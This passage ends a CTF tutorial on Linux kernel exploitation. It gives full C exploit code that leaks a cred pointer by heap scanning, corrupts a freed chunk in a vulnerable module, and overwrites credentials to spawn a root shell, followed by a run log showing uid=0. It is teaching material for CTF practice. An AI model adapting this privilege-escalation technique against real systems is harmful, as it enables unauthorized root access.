char scan[] = "TestTestTest";

int main() {
  printf("Running Exploitation...\n");
  
  uintptr_t cred;
  prctl(PR_SET_NAME, scan);

  init();

  // cleanup chunks for a more stable fastbin attack
  for(int i = 0; i < 64; i++) {
    kmalloc(i, 'A' + i, 0x40);
  }
  
  printf("Leaking Base Adress\n");
  kread(63, BUF_SIZE, -BUF_SIZE);

  // We scan a large segment of heap
  // And use heap fengshui to find cred
  char* ret = (char*) memmem(buf, sizeof(buf), scan, sizeof(scan) - 1);
  if (ret) {
    cred = *(uintptr_t*)(ret - 8);
    assert(*(uintptr_t*)(ret - 0x10) == cred);
    printf("%p %p\n", (void*)(ret - buf), (void*)cred);
    puts(ret);
  } else {
    exit(-1);
  }

  kfree(61);
  kfree(62);
  *(uintptr_t*) buf = cred - 0x10;
  kwrite(63, 0x40, -0x40);

  // Change cred to following layout
  kmalloc(62, 0, 0x40);
  uint64_t arr[8] = {0x0000000000000000,0x0000000000000000
    ,0x0000000000000003,0x0000000000000000
	,0x0000000000000000,0x0000000000000000
	,0x0000000000000000,0x0000000000000000};

  arg.size = 0x40;
  arg.idx = 61;
  arg.user_ptr = (char *) arr;
  ioctl(fd, 0x30000, &arg);

  // get shell
  char* shargv[] = {"/bin/sh", NULL};
  execve("/bin/sh", shargv, NULL);

  // special thanks
  return 2019;
}

You might find that we didn’t use kernel base address. But an alternative method is editing mod tree to get shell, which requires kernel base address leak.

And:

~ $ /exp
Running Exploitation...
Leaking Base Adress
0xd0c88 0xffff99db0d91b100
TestTestTest
/home/pwn # id
uid=0(root) gid=0(root) groups=0(root)

Conclusion

This post taught you about basic kernel pwn in CTF. I may update real world cases later..